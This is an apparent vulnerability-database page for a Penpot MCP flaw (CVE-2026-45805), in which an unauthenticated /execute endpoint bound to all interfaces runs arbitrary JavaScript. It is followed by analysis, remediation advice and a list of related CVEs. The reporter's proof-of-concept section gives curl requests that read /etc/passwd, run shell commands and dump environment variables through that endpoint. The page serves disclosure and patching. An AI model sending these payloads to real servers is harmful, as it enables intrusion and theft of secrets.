Skip to main content

Penpot MCP CVE-2026-45805

| EUVDEUVD-2026-44700 HIGH
Exposed Dangerous Method or Function (CWE-749)
2026-05-19 https://github.com/penpot/penpot GHSA-22qr-rp27-j9wm
8.8
CVSS 3.1 · Vendor: https://github.com/penpot/penpot
Share

Severity by source

Vendor (https://github.com/penpot/penpot) PRIMARY
8.8 HIGH
AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Primary rating from Vendor (https://github.com/penpot/penpot) · only source for this CVE.

CVSS VectorVendor: https://github.com/penpot/penpot

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Adjacent
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
May 19, 2026 - 20:15 vuln.today
Analysis Generated
May 19, 2026 - 20:15 vuln.today

DescriptionCVE.org

Summary

The MCP module's ReplServer binds to all interfaces (0.0.0.0:4403) and exposes a /execute endpoint that runs arbitrary code with zero authentication. Anyone on the network can POST JavaScript and it runs on the server. The main PenpotMcpServer was partially fixed for a similar binding issue (#8683), but ReplServer.ts was missed.

Details

mcp/packages/server/src/ReplServer.ts:89:

typescript
this.server = this.app.listen(this.port, () => {
    // NO HOST ARGUMENT - Express defaults to 0.0.0.0

Compare with PenpotMcpServer.ts:301 which correctly binds to this.host (default "localhost"):

typescript
this.app.listen(this.port, this.host, async () => {

The /execute endpoint at ReplServer.ts:52-79:

typescript
this.app.post("/execute", async (req, res) => {
    const { code } = req.body;
    // No auth check. Executes code via PluginBridge.executePluginTask()
    const task = new ExecuteCodePluginTask({ code });
    const result = await this.pluginBridge.executePluginTask(task);

No auth middleware, no token check, no nothing. POST JSON with a code field and it runs.

This was partially flagged in #8683 (March 2026), which noted that PenpotMcpServer.ts was binding to 0.0.0.0. PR #8686 attempted a fix but was closed without merging, and it only touched PenpotMcpServer.ts and vite.config.ts - ReplServer.ts wasn't in the diff. On current develop, ReplServer.ts line 89 still calls listen(this.port) with no host argument.

PoC

I ran the ReplServer with Express (matching the actual dependency) and tested from localhost and from a Docker container on the same network.

bash
$ node server.js
REPL server started on port 4403
Bound to: :::4403
All interfaces: YES

Unauthenticated code execution:

bash
$ curl -s -X POST http://localhost:4403/execute \
    -H "Content-Type: application/json" \
    -d '{"code":"require(\"os\").hostname()"}'
{"success":true,"result":"kali"}

$ curl -s -X POST http://localhost:4403/execute \
    -H "Content-Type: application/json" \
    -d '{"code":"require(\"fs\").readFileSync(\"/etc/passwd\",\"utf8\").split(\"\\n\").slice(0,3).join(\"\\n\")"}'
{"success":true,"result":"root:x:0:0:root:/root:/usr/bin/zsh\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin"}

$ curl -s -X POST http://localhost:4403/execute \
    -H "Content-Type: application/json" \
    -d '{"code":"require(\"child_process\").execSync(\"id\").toString()"}'
{"success":true,"result":"uid=1000(kali) gid=1000(kali) groups=1000(kali)...\n"}

$ curl -s -X POST http://localhost:4403/execute \
    -H "Content-Type: application/json" \
    -d '{"code":"JSON.stringify(Object.keys(process.env).slice(0,5))"}'
{"success":true,"result":"[\"SHELL\",\"SESSION_MANAGER\",\"WINDOWID\",\"QT_ACCESSIBILITY\",\"COLORTERM\"]"}

Binding verification:

$ ss -tlnp | grep 4403
LISTEN  0  511  *:4403  *:*  users:(("node",pid=696955,fd=21))

Listening on *:4403 - all interfaces.

Remote access from Docker container:

bash
$ docker exec penpot-backend curl -s http://172.18.0.1:4403/
REPL Server - Penpot MCP (no auth)

Reachable from any container on the Docker network.

Impact

Unauthenticated RCE on any machine running the MCP module. Read files, execute commands, dump environment variables (which often contain database credentials, API keys, secrets). The MCP module isn't part of the default Docker deployment, but developers and teams using the MCP integration for AI-assisted design work would run it locally. In shared development environments or CI/CD, the exposed port is reachable from the network.

Suggested fix

Two lines:

  1. Add a host parameter to the listen call in ReplServer.ts:89:
typescript
this.server = this.app.listen(this.port, 'localhost', () => {
  1. Add authentication to the /execute endpoint. Even a shared secret from an environment variable would be better than nothing.

AnalysisAI

Unauthenticated remote code execution in Penpot MCP module's ReplServer (npm @penpot/mcp < 2.15.0) allows anyone on the adjacent network to POST arbitrary JavaScript to a /execute endpoint and have it executed by the Node.js process. The flaw stems from Express defaulting the listen() bind address to 0.0.0.0 instead of localhost, combined with a complete absence of authentication on the REPL endpoint. No public exploit identified at time of analysis beyond the reporter's working PoC included in the GHSA advisory.

Technical ContextAI

Penpot is an open-source design and prototyping platform; its MCP (Model Context Protocol) module exposes integrations used for AI-assisted design workflows and is shipped as the npm package @penpot/mcp. The vulnerable component is ReplServer.ts, an Express-based HTTP server that calls this.app.listen(this.port, ...) without a host argument - Express then binds to 0.0.0.0, making the service reachable on every network interface rather than only loopback. The /execute route accepts a JSON body with a code field and passes it to PluginBridge.executePluginTask() via an ExecuteCodePluginTask, evaluating it inside the server's Node.js context with full access to require, child_process, fs, and process.env. This maps cleanly to CWE-749 (Exposed Dangerous Method or Function): an internal-only debugging/REPL surface was inadvertently exposed without any access control, and a sibling component (PenpotMcpServer.ts) was already patched for the same binding mistake in issue #8683 while ReplServer.ts was overlooked.

RemediationAI

Vendor-released patch: upgrade @penpot/mcp to 2.15.0 or later (npm install @penpot/mcp@2.15.0), which is the fixed version per the GHSA advisory at https://github.com/advisories/GHSA-22qr-rp27-j9wm. Until upgrade is possible, bind the REPL server to loopback by editing mcp/packages/server/src/ReplServer.ts line 89 to pass 'localhost' (or 127.0.0.1) as the host argument to app.listen, mirroring the fix already applied in PenpotMcpServer.ts at line 301. As a network-layer compensating control, block inbound TCP/4403 at the host firewall (iptables/nftables/Windows Defender Firewall) for all non-loopback interfaces, and ensure Docker port mappings do not publish 4403; the trade-off is that any legitimate cross-host MCP REPL usage will break, which is acceptable since the endpoint was never intended for remote use. Adding a shared-secret token check on /execute is a useful defense-in-depth step but should not substitute for the bind fix, since a token alone still exposes the attack surface to brute-force and credential leakage.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-45805 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy